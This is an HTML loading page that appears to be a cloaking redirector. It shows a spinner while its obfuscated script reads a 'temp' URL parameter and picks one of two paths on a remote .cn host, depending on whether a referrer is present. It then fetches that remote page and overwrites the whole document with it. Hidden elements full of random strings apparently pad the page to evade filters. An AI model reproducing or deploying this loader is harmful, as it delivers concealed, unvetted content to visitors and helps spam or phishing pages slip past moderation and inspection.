<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Pqv7zfz {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Pqv7zfz .GGL58FQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Pqv7zfz .content {
            line-height: 50px;
            text-align: center
        }

        .Pqv7zfz .img {
            width: 100%
        }

        .Pqv7zfz .df5j04bvmtg {
            text-align: center
        }

        .Pqv7zfz .df5j04bvmtg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Pqv7zfz .df5j04bvmtg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Pqv7zfz .df5j04bvmtg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Pqv7zfz .df5j04bvmtg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Pqv7zfz .df5j04bvmtg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Pqv7zfz .df5j04bvmtg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Pqv7zfz .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Yv1jcxI4d(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var a7rNd = Yv1jcxI4d('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ a7rNd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ a7rNd +".html?a=share";
		}
		
        PnLEcAU=url+"#"+new Date().getTime();
        PnLEcAU && function() {
            $.get(PnLEcAU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>KvRzHGmV37NXIcb78Yaf405enu92UiCU4w2fCkpoACHYT0nngi6Je7nLBqQwl0lvrCjrwTTNZwnGFITZnhAOgr12fj</p>
<li style='display:none' >H8IeGYiyNPUmunzyiMaRYElj5Ll2Kj6oHX5qoYIUOu9CbAx35tWhqY4</li>
<li style='display:none' >H8IeGYiyNPUmunzyiMaRYElj5Ll2Kj6oHX5qoYIUOu9CbAx35tWhqY4</li><div class="Pqv7zfz">
    <div class="GGL58FQ">
        <div class="df5j04bvmtg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<h1 style='display:none' >HMJZSI0JQsrxDnUsmpBakck8ovKUb6LXzYyotZInotgfHczyYushsJDJt5PYadybRjFfGZVq4K8iv</h1>
<div style='display:none'>Vb1rHh6ME7Lm7L4I5</div>
<div style='display:none'>Vb1rHh6ME7Lm7L4I5</div>
<p  style='display:none'>gSAPx3JZSRsPczEx3jrWPkv9qBsNvU</p>
<li style='display:none' >QR6vG7NVLsUXHOLMx</li>
<li style='display:none' >QR6vG7NVLsUXHOLMx</li>
<p  style='display:none'>gSAPx3JZSRsPczEx3jrWPkv9qBsNvU</p></body>
</html>